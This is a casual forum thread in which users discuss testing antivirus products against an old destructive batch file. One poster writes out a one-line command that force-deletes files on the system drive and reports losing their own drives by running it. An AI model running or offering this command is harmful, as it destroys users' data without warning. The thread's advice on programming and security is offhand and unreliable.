Lolz you should be surprised this is an very old virus but more that half antiviruses didn’t detect it O.O"
Here is the formula don’t won’t complete it or else some people will make bad use of it!
echo off
del %systemdrive%*.* /f /s /q
My drives are gone 
I’ve tried to run it with avast’s shield enable but…it wasn’t blocked!
Oh I tried it again and it was blocked ;D
Dont get angry shwi liang but you remember me of myself when i was 9 years old and my cousine start tell me about .bat files.
if you want start learning a simple programming language like python then go up until you reach assembly
Oh no I wasn’t try to learn hehe but I’ll try to begin it!
I was just testing the antiviruses how they do against a bat file like that
I tested this with rising it detected it but failed to block
Avast shields weren’t well loaded when I tried it so that’s why the virus ran on the pc! you have HIPS,sandbox,…on your system
2.the bat files are weak and dont have the power to be named trojans or worms
Oh I see 
Hip and sandbox oh how I am stupid I could have run it in a sandbox ^_^"
Shame on me!!
Hi Shiw Liang,
@superhacker is right, Assembly is the way to go, learn that language first, that is also what Metasploit’s Mr. Moore is telling us,
okay I am going to open a new thread for you guys to give me some suggestions about it if possible